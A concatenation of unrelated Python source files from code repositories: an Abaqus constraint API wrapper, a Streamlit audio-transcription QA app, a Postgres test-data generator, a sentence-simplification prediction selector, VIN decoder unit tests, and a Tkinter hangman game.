of\n the PartInstance. If this argument is set to an empty sequence, the PartInstance will\n remain fixed in space during the analysis. The sequence can have either one object or\n three objects.\n\n Returns\n -------\n DisplayBody\n A DisplayBody object.\n \"\"\"\n self.constraints[name] = constraint = DisplayBody(name, instance, controlPoints)\n return constraint\n\n @abaqus_method_doc\n def EmbeddedRegion(\n self,\n name: str,\n embeddedRegion: Region,\n hostRegion: Region,\n weightFactorTolerance: float | None = None,\n toleranceMethod: Literal[C.FRACTIONAL, C.BOTH, C.ABSOLUTE] = BOTH,\n absoluteTolerance: float = 0,\n fractionalTolerance: float = 0,\n ) -> EmbeddedRegion:\n \"\"\"This method creates a EmbeddedRegion object.\n\n .. note::\n This function can be accessed by::\n\n mdb.models[name].EmbeddedRegion\n\n Parameters\n ----------\n name\n A String specifying the constraint repository key.\n embeddedRegion\n A Region object specifying the body region to be embedded.\n hostRegion\n A Region object specifying the host region. A value of None indicates that the host\n region is the whole model.\n weightFactorTolerance\n A Float specifying a small value below which the weighting factors will be zeroed out.\n The default value is 10⁻⁶.\n toleranceMethod\n A SymbolicConstant specifying the method used to determine the embedded element\n tolerance. Possible values are ABSOLUTE, FRACTIONAL, and BOTH. The default value is\n BOTH.\n absoluteTolerance\n A Float specifying the absolute value by which a node on the embedded region may lie\n outside the host region. If **absoluteTolerance** = 0.0, the **fractionalTolerance** value\n will be used. 
The default value is 0.0.This argument applies only when\n **toleranceMethod** = ABSOLUTE or BOTH.\n fractionalTolerance\n A Float specifying the fractional value by which a node on the embedded region may lie\n outside the host region. The fractional value is based on the average element size\n within the host region. The default value is 0.05.If both tolerance arguments are\n specified, the smaller value will be used.This argument applies only when\n **toleranceMethod** = FRACTIONAL or BOTH.\n\n Returns\n -------\n EmbeddedRegion\n An EmbeddedRegion object.\n \"\"\"\n self.constraints[name] = constraint = EmbeddedRegion(\n name,\n embeddedRegion,\n hostRegion,\n weightFactorTolerance,\n toleranceMethod,\n absoluteTolerance,\n fractionalTolerance,\n )\n return constraint\n\n @abaqus_method_doc\n def Equation(self, name: str, terms: tuple) -> Equation:\n \"\"\"This method creates an Equation object.\n\n .. note::\n This function can be accessed by::\n\n mdb.models[name].Equation\n\n Parameters\n ----------\n name\n A String specifying the constraint repository key.\n terms\n A sequence of (Float, String, Int, Int) sequences specifying a coefficient, Set name,\n degree of freedom, and coordinate system ID. The coordinate system ID is optional.\n\n Returns\n -------\n Equation\n An Equation object.\n\n Raises\n ------\n Exception\n If **terms** does not contain more than one entry, Equation must have two or more terms.\n \"\"\"\n self.constraints[name] = constraint = Equation(name, terms)\n return constraint\n\n @abaqus_method_doc\n def MultipointConstraint(\n self,\n name: str,\n surface: Region,\n controlPoint: Region,\n mpcType: Literal[C.USER_MPC, C.BEAM_MPC, C.ELBOW_MPC, C.TIE_MPC, C.MPC, C.PIN_MPC, C.LINK_MPC],\n csys: str | None = None,\n userType: int = 0,\n userMode: Literal[C.DOF_MODE_MPC, C.USER_MPC, C.NODE_MODE_MPC] = DOF_MODE_MPC,\n ) -> MultipointConstraint:\n \"\"\"This method creates a MultipointConstraint object.\n\n .. note::\n This function can be accessed by::\n\n mdb.models[name].MultipointConstraint\n\n Parameters\n ----------\n name\n A String specifying the constraint repository key.\n surface\n A Region object specifying the surface on which the MultipointConstraint nodes are\n located.\n controlPoint\n A Region object specifying the constraint control point.\n mpcType\n A SymbolicConstant specifying the MPC type of the constraint. Possible values are\n BEAM_MPC, ELBOW_MPC, PIN_MPC, LINK_MPC, TIE_MPC, and USER_MPC.\n csys\n None or a DatumCsys object specifying the initial orientation of the local coordinate\n system for the MultipointConstraint's degrees of freedom. If **localCsys** = None, the\n MultipointConstraint is defined in the global coordinate system. The default value is\n None.\n userType\n An Int specifying to differentiate between different constraint types in a user-defined\n MultipointConstraint. The default value is 0.The **userType** argument applies only when\n **mpcType** = USER_MPC.\n userMode\n A SymbolicConstant specifying the mode of the constraint when it is user-defined.\n Possible values are DOF_MODE_MPC and NODE_MODE_MPC. 
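A hedged sketch of the MultipointConstraint call being documented; the model key and region names are hypothetical:

        model = mdb.models['Model-1']
        model.MultipointConstraint(name='Constraint-3',
                                   surface=model.rootAssembly.surfaces['TubeEnd'],
                                   controlPoint=model.rootAssembly.sets['RP-1'],
                                   mpcType=BEAM_MPC)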
The default value is\n DOF_MODE_MPC.The **userMode** argument applies only when **mpcType** = USER_MPC.\n\n Returns\n -------\n MultipointConstraint\n A MultipointConstraint object.\n \"\"\"\n self.constraints[name] = constraint = MultipointConstraint(\n name, surface, controlPoint, mpcType, csys, userType, userMode\n )\n return constraint\n\n @abaqus_method_doc\n def RigidBody(\n self,\n name: str,\n refPointRegion: Region,\n bodyRegion: str | None = None,\n tieRegion: str | None = None,\n pinRegion: str | None = None,\n surfaceRegion: str | None = None,\n refPointAtCOM: Boolean = OFF,\n isothermal: Boolean = OFF,\n ) -> RigidBody:\n \"\"\"This method creates a RigidBody object.\n\n .. note::\n This function can be accessed by::\n\n mdb.models[name].RigidBody\n\n Parameters\n ----------\n name\n A String specifying the constraint repository key.\n refPointRegion\n A Region object specifying the reference point.\n bodyRegion\n None or a Region object specifying the elements constrained to the movement of the\n reference point. The default value is None.\n tieRegion\n None or a Region object specifying the nodes tied to the movement of the reference\n point. The default value is None.\n pinRegion\n None or a Region object specifying the nodes pinned to the movement of the reference\n point. The default value is None.\n surfaceRegion\n None or a Region object specifying the analytic surface constrained to the movement of\n the reference point. The default value is None.\n refPointAtCOM\n A Boolean specifying whether the analysis product should recompute the reference point\n position to be at the center of mass. The default value is OFF.\n isothermal\n A Boolean specifying whether the temperature degree of freedom should be constrained.\n The default value is OFF.\n\n Returns\n -------\n RigidBody\n A RigidBody object.\n \"\"\"\n self.constraints[name] = constraint = RigidBody(\n name,\n refPointRegion,\n bodyRegion,\n tieRegion,\n pinRegion,\n surfaceRegion,\n refPointAtCOM,\n isothermal,\n )\n return constraint\n\n @abaqus_method_doc\n def ShellSolidCoupling(\n self,\n name: str,\n shellEdge: Region,\n solidFace: Region,\n positionToleranceMethod: Literal[C.COMPUTED, C.SPECIFIED] = COMPUTED,\n positionTolerance: float = 0,\n influenceDistanceMethod: Literal[C.DEFAULT, C.SPECIFIED] = DEFAULT,\n influenceDistance: float = 0,\n ) -> ShellSolidCoupling:\n \"\"\"This method creates a ShellSolidCoupling object.\n\n .. note::\n This function can be accessed by::\n\n mdb.models[name].ShellSolidCoupling\n\n Parameters\n ----------\n name\n A String specifying the constraint repository key.\n shellEdge\n A Region object specifying the name of the shell edge surface.\n solidFace\n A Region object specifying the name of the solid surface.\n positionToleranceMethod\n A SymbolicConstant specifying the method used to determine the position tolerance.\n Possible values are COMPUTED and SPECIFIED. The default value is COMPUTED.\n positionTolerance\n A Float specifying the position tolerance. The default value is 0.0.The\n **positionTolerance** argument applies only when\n **positionToleranceMethod** = SPECIFIED. Note: Abaqus will not constrain nodes on the solid\n face region outside the position tolerance.\n influenceDistanceMethod\n A SymbolicConstant specifying the method used to determine the influence distance.\n Possible values are DEFAULT and SPECIFIED. The default value is DEFAULT.\n influenceDistance\n A Float specifying the influence distance. 
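A hedged sketch of the ShellSolidCoupling call being documented; the surface names are hypothetical:

        model = mdb.models['Model-1']
        model.ShellSolidCoupling(name='Constraint-4',
                                 shellEdge=model.rootAssembly.surfaces['ShellEdge'],
                                 solidFace=model.rootAssembly.surfaces['SolidFace'],
                                 positionToleranceMethod=COMPUTED)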
The **influenceDistance** argument applies only\n when **influenceDistanceMethod** = SPECIFIED. The default value is 0.0.\n\n Returns\n -------\n ShellSolidCoupling\n A ShellSolidCoupling object.\n \"\"\"\n self.constraints[name] = constraint = ShellSolidCoupling(\n name,\n shellEdge,\n solidFace,\n positionToleranceMethod,\n positionTolerance,\n influenceDistanceMethod,\n influenceDistance,\n )\n return constraint\n\n @abaqus_method_doc\n def Tie(\n self,\n name: str,\n main: Region,\n secondary: Region,\n adjust: Boolean = ON,\n positionToleranceMethod: Literal[C.COMPUTED, C.SPECIFIED] = COMPUTED,\n positionTolerance: float = 0,\n tieRotations: Boolean = ON,\n constraintRatioMethod: Literal[C.DEFAULT, C.SPECIFIED] = DEFAULT,\n constraintRatio: float = 0,\n constraintEnforcement: Literal[C.NODE_TO_SURFACE, C.SOLVER_DEFAULT, C.SURFACE_TO_SURFACE] = SOLVER_DEFAULT,\n thickness: Boolean = ON,\n ) -> Tie:\n \"\"\"This method creates a Tie object.\n\n .. note::\n This function can be accessed by::\n\n mdb.models[name].Tie\n\n Parameters\n ----------\n name\n A String specifying the constraint repository key.\n\n .. versionchanged:: 2022\n The ``master`` argument was renamed to ``main``.\n main\n A Region object specifying the name of the main surface.\n\n .. versionchanged:: 2022\n The ``slave`` argument was renamed to ``secondary``.\n secondary\n A Region object specifying the name of the secondary surface.\n adjust\n A Boolean specifying whether initial positions of tied secondary nodes are adjusted to\n lie on the main surface. The default value is ON.\n positionToleranceMethod\n A SymbolicConstant specifying the method used to determine the position tolerance.\n Possible values are COMPUTED and SPECIFIED. The default value is COMPUTED.\n positionTolerance\n A Float specifying the position tolerance. The **positionTolerance** argument applies only\n when **positionToleranceMethod** = SPECIFIED. The default value is 0.0.\n tieRotations\n A Boolean specifying whether rotation degrees of freedom should be tied. The default\n value is ON.\n constraintRatioMethod\n A SymbolicConstant specifying the method used to determine the constraint ratio.\n Possible values are DEFAULT and SPECIFIED. The default value is DEFAULT.\n constraintRatio\n A Float specifying the fractional distance between the main reference surface and the\n secondary node at which the translational constraint should act. The **constraintRatio**\n argument applies only when **constraintRatioMethod** = SPECIFIED. The default value is 0.0.\n constraintEnforcement\n A SymbolicConstant specifying the discretization method. Possible values are\n SOLVER_DEFAULT, NODE_TO_SURFACE, and SURFACE_TO_SURFACE. The default value is\n SOLVER_DEFAULT.\n thickness\n A Boolean specifying whether shell element thickness is considered. 
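A hedged sketch of the Tie call being documented; the model key and surface names are hypothetical:

        # minimal sketch: tie two surfaces using surface-to-surface discretization
        model = mdb.models['Model-1']
        model.Tie(name='Constraint-5',
                  main=model.rootAssembly.surfaces['MainSurf'],
                  secondary=model.rootAssembly.surfaces['SecondarySurf'],
                  adjust=ON,
                  constraintEnforcement=SURFACE_TO_SURFACE)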
The default value is\n ON.\n\n Returns\n -------\n Tie\n A Tie object.\n \"\"\"\n self.constraints[name] = constraint = Tie(\n name,\n main,\n secondary,\n adjust,\n positionToleranceMethod,\n positionTolerance,\n tieRotations,\n constraintRatioMethod,\n constraintRatio,\n constraintEnforcement,\n thickness,\n )\n return constraint\n","repo_name":"haiiliin/abqpy","sub_path":"src/abaqus/Constraint/ConstraintModel.py","file_name":"ConstraintModel.py","file_ext":"py","file_size_in_byte":21430,"program_lang":"python","lang":"en","doc_type":"code","stars":91,"dataset":"github-code","pt":"29"} +{"seq_id":"10118580895","text":"import os\nimport streamlit as st\nfrom app import AudioTranscription\n\ndef main():\n\n st.header(\"MVP - Quality Assurance\")\n\n # Upload button\n audio_file = st.file_uploader(\"Upload Audio File\", type=[\"mp3\", \"wav\"])\n\n if audio_file:\n # Process the uploaded audio file\n file_name = os.path.splitext(os.path.basename(audio_file.name))[0]\n audio_transcription = AudioTranscription(audio_file, file_name)\n\n transcript_text = \"\"\n\n # Transcribe and save\n with st.spinner(\"Transcribing audio...\"):\n transcript_text = audio_transcription.transcribe()\n\n # Display the transcription\n st.subheader(\"Transcription\")\n # st.text_area(\"transcript\", value=transcript_text, key=\"transcript_text\", height=800)\n st.text_area(\"transcript\", value=transcript_text, key=\"transcript_text\")\n\n # Show \"Send for Review\" button when transcription is done\n if transcript_text:\n if st.button(\"Send for Review\"):\n # Start the loading spinner\n with st.spinner(\"Reviewing audio...\"):\n classification = audio_transcription.classify_call()\n data = audio_transcription.extract_data()\n review_text, score, status = audio_transcription.qa_review() # Call the function to submit the review\n\n # Display the returned review\n # st.subheader(\"Review\")\n # st.text_area(\"Review Text\", value=review_text, key=\"review_text\")\n st.subheader(\"QA Review\")\n calltype, source = classification.split(\":\")\n\n call_data = \"Calltype: \" + calltype.strip() + \"\\n\" + \"Source: \" + source + \"\\n\" + \"QA comment: \" + status + \"ed \\n\\n\\n\"\n\n data += \"\\n\\n\"\n\n # st.write(call_data + data)\n\n st.text_area(\"review\", value=(call_data + data + review_text), height = 1000)\n\n\n if status == \"Pass\":\n st.success(str(score) + \"\\t\" + status, icon=\"✅\") # Display success message\n if status == \"Fail\":\n st.error(str(score) + \"\\t\" + status, icon=\"❌\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Lord-Haji/MVP-QA","sub_path":"streamlit-old.py","file_name":"streamlit-old.py","file_ext":"py","file_size_in_byte":2222,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"2472882595","text":"import random\nimport psycopg2\n\ndef random_gen(id):\n modelId = random.randint(1, 4)\n pageNumber = random.randint(0, 300)\n xCoord = random.randint(0, 500)\n yCoord = random.randint(0, 1000)\n width = random.randint(0, 500)\n height = width // 2\n modelPlacingId = id\n price = random.randint(1000, 5000)\n payment = False\n chosenByUser = False\n randomBool = random.randint(0, 1)\n if randomBool == 0:\n chosenByUser = False\n else:\n chosenByUser = True\n if chosenByUser == True:\n randomBool = random.randint(0, 1)\n if randomBool == 0:\n payment = False\n else:\n payment = True\n statusPart1 = \"Not accepted\"\n if chosenByUser == True:\n statusPart1 = \"Accepted\"\n statusPart2 = \"not paid\"\n if payment == 
True:\n statusPart2 = \"paid\"\n status = statusPart1 + \" and \" + statusPart2\n return {\n \"modelId\": modelId, \"pageNumber\": pageNumber, \"xCoord\": xCoord, \"yCoord\": yCoord, \"width\": width, \"height\": height, \"modelPlacingId\": modelPlacingId, \"price\": price, \"payment\": payment,\n \"status\": status, \"chosenByUser\": chosenByUser\n\n }\n\ndef select_filtered_values1():\n conn = psycopg2.connect(dbname='postgres', user='postgres', password='06012002', host='localhost')\n rows = []\n for i in range(0, 100000):\n args = random_gen(i + 1)\n with conn.cursor() as cursor:\n cursor.execute(\n '''INSERT INTO \"public.ModelPlacing\" (\"modelId\", \"pageNumber\", \"xCoord\", \"yCoord\", \"width\", \"height\", \"price\", \"payment\", \"status\", \"chosenByUser\") VALUES(%s,%s,%s,%s,%s,%s,%s,%s,'%s',%s)''' % (\n str(args[\"modelId\"]), str(args[\"pageNumber\"]), str(args[\"xCoord\"]), str(args[\"yCoord\"]),\n str(args[\"width\"]), str(args[\"height\"]), str(args[\"price\"]), str(args[\"payment\"]),\n str(args[\"status\"]),\n str(args[\"chosenByUser\"])))\n conn.commit()\n conn.close()\n #rows = cursor.fetchall()\n #return rows\n\ndef select_filtered_values2():\n conn = psycopg2.connect(dbname='architecture2', user='postgres', password='06012002', host='localhost')\n rows = []\n price_arr = []\n for i in range(0, 50000):\n args = random_gen(i + 1)\n with conn.cursor() as cursor:\n cursor.execute(\n '''INSERT INTO \"architecture2\".\"ModelPlacing\" (\"pageNumber\", \"xCoord\", \"yCoord\", \"width\", \"height\", \"status\", \"chosenByUser\") VALUES(%s,%s,%s,%s,%s,'%s',%s)''' % (\n str(args[\"pageNumber\"]), str(args[\"xCoord\"]), str(args[\"yCoord\"]),\n str(args[\"width\"]), str(args[\"height\"]), str(args[\"status\"]), str(args[\"chosenByUser\"])))\n\n price_arr.append({\"model_placing_id\": str(i + 1), \"price\": str(args[\"price\"]), \"payment\": str(args[\"payment\"])})\n\n conn.commit()\n conn.close()\n\n conn = psycopg2.connect(dbname='architecture2', user='postgres', password='06012002', host='localhost')\n for i in range(0, 50000):\n with conn.cursor() as cursor:\n cursor.execute(\n '''INSERT INTO \"architecture2\".\"ModelPlacingPayment\" (\"model_placing_id\", \"price\", \"payment\") VALUES(%s,%s,%s)''' % (\n str(i + 1), str(price_arr[i][\"price\"]), str(price_arr[i][\"payment\"])))\n\n conn.commit()\n conn.close()\n\n\n\nif __name__ == \"__main__\":\n select_filtered_values1()\n select_filtered_values2()\n","repo_name":"MykolaOnyshchuk/Lab3-architecture","sub_path":"dataGeneration.py","file_name":"dataGeneration.py","file_ext":"py","file_size_in_byte":3432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"5735486754","text":"import json\nimport argparse\nfrom collections import Counter\nimport re\nfrom itertools import zip_longest\nfrom pathlib import Path\nimport pandas as pd\nimport numpy as np\nfrom tqdm.auto import tqdm\nimport torch\nfrom transformers import AutoTokenizer, AutoModel\nfrom rouge import Rouge\nfrom sklearn.metrics.pairwise import cosine_similarity\nfrom easse.sari import corpus_sari\nfrom sklearn.ensemble import RandomForestRegressor\n\nfrom utils import get_word_tokens, mean_pooling, get_similarities, get_rougel\n\n\nDATA_DIR = Path(\"./data\")\nWIKI_DIR = DATA_DIR / \"WikiSimple-translated\"\nDEV_PATH = DATA_DIR / \"dev_sents.csv\"\nTEST_PATH = DATA_DIR / \"public_test_only.csv\"\n\n\ndef get_preds_df(preds, input_texts):\n preds_df = pd.DataFrame({\"pred\": preds.values.reshape(-1, 
1).ravel()})\n preds_df[\"input\"] = np.array([[i] * 5 for i in input_texts]).ravel()\n preds_df[\"pred_len\"] = preds_df[\"pred\"].apply(lambda x: len(get_word_tokens(x)))\n preds_df[\"input_len\"] = preds_df[\"input\"].apply(lambda x: len(get_word_tokens(x)))\n preds_df[\"cosine_sim\"] = preds_df.apply(lambda x: get_similarities(model, tokenizer, x[\"pred\"], x[\"input\"]),\n axis=1)\n preds_df[\"cosine_sim\"] = preds_df[\"cosine_sim\"].apply(lambda x: x[0][0])\n preds_df[\"rouge_l\"] = preds_df.apply(lambda x: get_rougel(x[\"pred\"], x[\"input\"]), axis=1)\n return preds_df\n\n\ndef get_rf_from_dev(dev_df, preds_dev, max_depth=None, random_state=19):\n preds_df = preds_dev.copy()\n dev_df_grouped = dev_df.groupby(\"input\").agg(\n {\"output\": list, \"cosine_sim\": list, \"rouge_l\": list, \"input_len\": max, \"output_len\": list}\n ).reset_index()\n preds_df[\"ref\"] = [l for sublist in dev_df_grouped[\"output\"].apply(lambda x: [x] * 5).tolist() for l in sublist]\n preds_df[\"ref\"] = preds_df[\"ref\"].apply(lambda x: [[i] for i in x])\n\n preds_df[\"pred_len\"] = preds_df[\"pred\"].apply(lambda x: len(get_word_tokens(x)))\n preds_df[\"input_len\"] = preds_df[\"input\"].apply(lambda x: len(get_word_tokens(x)))\n\n preds_df[\"sari\"] = preds_df.apply(\n lambda x: corpus_sari(\n orig_sents=[x[\"input\"]],\n sys_sents=[x[\"pred\"]],\n refs_sents=x[\"ref\"],\n ), axis=1\n )\n \n rf = RandomForestRegressor(n_estimators=1000, max_depth=max_depth, n_jobs=-1, random_state=random_state)\n \n X_train = preds_df[[\"cosine_sim\", \"rouge_l\", \"input_len\", \"pred_len\"]]\n y_train = preds_df[\"sari\"]\n \n rf.fit(X_train, y_train)\n \n return rf, preds_df\n\n\nif __name__ == \"__main__\":\n argparser = argparse.ArgumentParser()\n argparser.add_argument(\"--input_test_path\", required=True, type=str, default=\"data/public_test_only.csv\")\n argparser.add_argument(\"--input_dev_metrics_path\", required=True, type=str,\n default=\"data/prepared_data/dev_df_metrics.csv\")\n argparser.add_argument(\"--test_predictions_path\", required=True, type=str, default=\"predictions/test_answers_5.csv\")\n argparser.add_argument(\"--dev_predictions_path\", required=True, type=str, default=\"predictions/dev_answers_5.csv\")\n argparser.add_argument(\"--submission_folder\", required=True, type=str, default=\"submissions\")\n argparser.add_argument(\"--seed\", required=True, type=int, default=19)\n args = argparser.parse_args()\n for arg in vars(args):\n print(f\"{arg}: {getattr(args, arg)}\")\n\n tokenizer = AutoTokenizer.from_pretrained(\"sberbank-ai/sbert_large_nlu_ru\")\n model = AutoModel.from_pretrained(\"sberbank-ai/sbert_large_nlu_ru\")\n model.to(\"cuda\")\n\n with open(args.input_test_path) as f:\n test_input = [l.strip() for l in f]\n\n dev_df = pd.read_csv(args.input_dev_metrics_path)\n dev_df_grouped = dev_df.groupby(\"input\").agg(\n {\"output\": list, \"cosine_sim\": list, \"rouge_l\": list, \"input_len\": max, \"output_len\": list}\n ).reset_index()\n dev_input = dev_df_grouped[\"input\"].tolist()\n\n pred_test = pd.read_csv(args.test_predictions_path)\n pred_test = get_preds_df(pred_test, test_input)\n\n preds_dev = pd.read_csv(args.dev_predictions_path)\n preds_dev = get_preds_df(preds_dev, dev_input)\n\n rf, preds_df = get_rf_from_dev(dev_df, preds_dev, max_depth=5, random_state=args.seed)\n\n pred_test[\"sari_pred\"] = rf.predict(pred_test[[\"cosine_sim\", \"rouge_l\", \"input_len\", \"pred_len\"]])\n tmp = pred_test.sort_values([\"input\", \"sari_pred\"], ascending=[True, False])[::5]\n 
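    # A hedged toy check (synthetic values, not project data) of the
    # sort-then-[::5] trick used above: after sorting by (input asc,
    # sari_pred desc), each input's 5 candidates are contiguous, so [::5]
    # keeps exactly the top-scoring row of every group.
    # toy = pd.DataFrame({'input': ['a'] * 5 + ['b'] * 5,
    #                     'pred': list('ABCDEFGHIJ'),
    #                     'sari_pred': [3, 1, 5, 2, 4, 9, 6, 8, 7, 5]})
    # best = toy.sort_values(['input', 'sari_pred'], ascending=[True, False])[::5]
    # best['pred'].tolist() == ['C', 'F']  # highest-scoring candidate per input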
pred_dict = dict(zip(tmp[\"input\"], tmp[\"pred\"]))\n\n predictions = [pred_dict[i] for i in test_input]\n\n submission_folder = Path(args.submission_folder)\n submission_folder.mkdir(exist_ok=True)\n pd.DataFrame(predictions).to_csv(submission_folder / \"answer.csv\", index=False, header=None)\n","repo_name":"InstituteForIndustrialEconomics/DialogueEvaluation21_RuSimpleSentEval","sub_path":"choose_prediction.py","file_name":"choose_prediction.py","file_ext":"py","file_size_in_byte":4689,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"23630964687","text":"import unittest\nfrom pyvin import VIN, VINError, DecodedVIN, RAISE, SKIP, PASS\nfrom .vin_samples import (INVALID,\n INVALID_SHORT,\n DECODED_TOYOTA_COROLLA,\n TOYOTA_COROLLA,\n HYUNDAI_ELANTRA,\n BATCH)\n\n\nclass TestPyVin(unittest.TestCase):\n def test_vin_single(self):\n vin = VIN(TOYOTA_COROLLA, error_handling=SKIP)\n self.assertIsInstance(vin, DecodedVIN)\n\n vin = VIN(TOYOTA_COROLLA, error_handling=RAISE)\n self.assertIsInstance(vin, DecodedVIN)\n\n def test_vin_single_invalid(self):\n vins = VIN(INVALID, error_handling=SKIP)\n self.assertEqual(vins, [])\n\n with self.assertRaises(VINError):\n VIN(INVALID, error_handling=RAISE)\n\n def test_vin_single_invalid_short(self):\n vin = VIN(INVALID_SHORT, error_handling=SKIP)\n self.assertEqual(vin, [])\n\n with self.assertRaises(VINError):\n VIN(INVALID_SHORT, error_handling=RAISE)\n\n def test_vin_single_invalid_empty(self):\n vin = VIN('', error_handling=SKIP)\n self.assertEqual(vin, [])\n\n with self.assertRaises(VINError):\n VIN('', error_handling=RAISE)\n\n def test_vin_single_invalid_none(self):\n vin = VIN(None, error_handling=SKIP)\n self.assertEqual(vin, [])\n\n with self.assertRaises(VINError):\n VIN(None, error_handling=RAISE)\n\n def test_vin_multi_minimal(self):\n \"\"\"When multiple vins are input (Iterable or as separate args),\n return a list of decoded vins\n \"\"\"\n samples = (TOYOTA_COROLLA, HYUNDAI_ELANTRA)\n vins = VIN(*samples)\n self.assertEqual(len(samples), len(vins))\n for vin in vins:\n self.assertIsInstance(vin, DecodedVIN)\n\n def test_vin_multi_large_batch(self):\n samples = BATCH\n vins = VIN(*samples)\n self.assertEqual(len(samples), len(vins))\n\n def test_invalid_in_multi(self):\n samples = (INVALID, TOYOTA_COROLLA)\n vins = VIN(*samples)\n self.assertIsInstance(vins, DecodedVIN)\n self.assertEqual(len([x for x in samples if x is not INVALID]), 1)\n\n def test_invalid_in_multi_raise(self):\n samples = (INVALID, TOYOTA_COROLLA)\n with self.assertRaises(VINError):\n VIN(*samples, error_handling=RAISE)\n\n def test_invalid_in_multi_pass(self):\n samples = (INVALID, TOYOTA_COROLLA)\n vins = VIN(*samples, error_handling=PASS)\n self.assertEqual(len(samples),\n len(vins))\n\n def test_vin_attrs(self):\n vin = VIN(TOYOTA_COROLLA)\n attrs = {k: v for k, v in vin.__dict__.items() if '__' not in k}\n self.assertDictEqual(attrs, DECODED_TOYOTA_COROLLA)\n","repo_name":"arpuffer/pyvin","sub_path":"tests/test_pyvin.py","file_name":"test_pyvin.py","file_ext":"py","file_size_in_byte":2797,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"29"} +{"seq_id":"41333599223","text":"\"\"\"\nHangman\nCreator: Kian Moloney\n\nThis game is hangman. The game was created using a class. Your job is to guess\nwhat the shown country is by pressing interactive buttons that are shown on\nscreen. If you guess incorrectly a total of 7 times, the game ends. 
There are\na total of 41 countries that you have to guess from. Use either the drop-down\nmenu or the x-button to exit the game.\n\"\"\"\n\nfrom tkinter import *\nfrom tkinter import messagebox\nfrom functools import partial\nfrom string import ascii_uppercase\nimport random\n\nWORDLIST = [\"FINLAND\", \"SWEDEN\", \"NORWAY\", \"DENMARK\", \"CHINA\", \"JAPAN\",\n \"INDIA\", \"TURKEY\", \"GERMANY\", \"RUSSIA\", \"POLAND\", \"SPAIN\",\n \"FRANCE\", \"PORTUGAL\", \"EGYPT\", \"ARGENTINA\", \"AMERICA\", \"CANADA\",\n \"GREECE\", \"ITALY\", \"SERBIA\", \"ESTONIA\", \"MEXICO\", \"UKRAINE\",\n \"HUNGARY\", \"ICELAND\", \"LUXEMBOURG\", \"MADAGASCAR\", \"INDONESIA\",\n \"AUSTRALIA\", \"ISRAEL\", \"CHILE\", \"IRELAND\", \"CROATIA\", \"ALBANIA\",\n \"NIGERIA\", \"MOROCCO\", \"SOMALIA\", \"BELGIUM\", \"LATVIA\", \"MALAYSIA\"]\n\n\nclass Hangman:\n def __init__(self):\n \"\"\"\n Constructor that creates all the parts of the GUI and all the\n attributes for the functions, the use of which is explained later.\n \"\"\"\n\n # Create the menu.\n self.__window = Tk()\n self.__window.title(\"Hangman - Guess the Country\")\n\n # Import the photos now that there is a main window.\n self.__photos = [\n PhotoImage(file=\"0.png\"), PhotoImage(file=\"1.png\"),\n PhotoImage(file=\"2.png\"), PhotoImage(file=\"3.png\"),\n PhotoImage(file=\"4.png\"), PhotoImage(file=\"5.png\"),\n PhotoImage(file=\"6.png\"), PhotoImage(file=\"7.png\")\n ]\n\n self.__wrong_guesses = 0\n\n # Create a top menu and cascade a submenu to it containing two buttons.\n top_menu = Menu(self.__window)\n self.__window.configure(menu=top_menu)\n sub_menu = Menu(top_menu, tearoff=False)\n top_menu.add_cascade(menu=sub_menu, label=\"Menu\")\n sub_menu.add_command(label=\"New game\", command=self.new_game)\n sub_menu.add_command(label=\"Quit\", command=self.quit_program)\n\n # Create a Label for the hangman photos and set the default photo.\n self.__hangman_label = Label(self.__window)\n self.__hangman_label.grid(row=0, column=12, columnspan=6, rowspan=7,\n sticky=E, padx=(0, 5))\n self.__hangman_label.configure(image=self.__photos[0])\n\n # Create a Label for the word to be guessed.\n self.__word_label = Label(self.__window)\n self.__word_label.grid(row=12, column=8, columnspan=3, sticky=E+W,\n padx=(10, 0))\n\n # An attribute to help to check if the user won. It is called spaced\n # word, because the selected country is presented to the user with\n # spaces between the letters.\n self.__spaced_word = \"\"\n\n # Make a list where the keyboard buttons can be placed.\n self.__buttons = []\n\n i = 0\n\n # To create the buttons, we first have to go through the letters,\n # so 'range(26)' for the amount of letters.\n for index in range(26):\n # Pick out a letter and make a button for it. 
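            # A hedged aside (toy values): functools.partial, used just below,
            # freezes arguments so Tkinter can later call the handler with none:
            # handler = partial(print, 'A', 0)  # stands in for partial(self.guess, letter, index)
            # handler()                         # prints: A 0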
The partial is used\n # to make sure an argument can be passed to the guess handler.\n letter = ascii_uppercase[index]\n self.__buttons.append(Button(self.__window, text=letter, font=\n \"Euphemia 10\",\n command=partial(self.guess, letter,\n index)))\n\n # Place the letters using the i variable.\n self.__buttons[index].grid(row=1+i//5, column=i % 5, sticky=E+W)\n i += 1\n\n # Create a 'new game' button beside the Z button.\n self.__new_game = Button(self.__window, text=\"New Game\",\n font=\"Euphemia\", command=self.new_game).grid(\n row=6, column=2,\n columnspan=4,\n sticky=W)\n\n self.new_game()\n\n # Greet the user and tell them how to play.\n self.__welcome_message = messagebox.showinfo(\"Hangman\",\n \"Welcome to Hangman!\\n\"\n \"Your job is to guess \"\n \"the country.\\nYou can \"\n \"answer incorrectly 7 \"\n \"times so make it count!\")\n self.__window.mainloop()\n\n def new_game(self):\n \"\"\"\n Start a new game, so in other words reset the buttons, get a new word,\n replace the old with the new one (unless it's the first game),\n and reset the wrong guesses.\n \"\"\"\n\n # Reset the amount of wrong guesses.\n self.__wrong_guesses = 0\n\n # Reset the image and all 26 letter buttons.\n self.__hangman_label.configure(image=self.__photos[0])\n for index in range(26):\n self.__buttons[index].configure(state=NORMAL)\n\n # Select a word out of the 41 countries.\n random_index = random.randint(0, 40)\n selected_word = WORDLIST[random_index]\n\n # Create spaces between the letters of the word and replace the letters\n # with underscores.\n self.__word_label.configure(text=\" \".join(\"_\" * len(selected_word)),\n font=\"Euphemia 14\")\n\n # Configure the spaced word for the guess method, so that it can make\n # it into a list, and use it to check if the user won.\n self.__spaced_word = \" \".join(selected_word)\n\n def quit_program(self):\n \"\"\"\n Simple exit function, in case the user wants to exit using the 'Quit'\n button.\n \"\"\"\n\n # Show a messagebox and destroy the window.\n messagebox.showinfo(\"Hangman - Guess the Country\",\n \"Thanks for playing!\")\n self.__window.destroy()\n\n def guess(self, letter, index):\n \"\"\"\n When a button is pressed, this method is called. This method's job\n consists of disabling the button, and if guessed correctly, checking\n if won and replacing underscores with 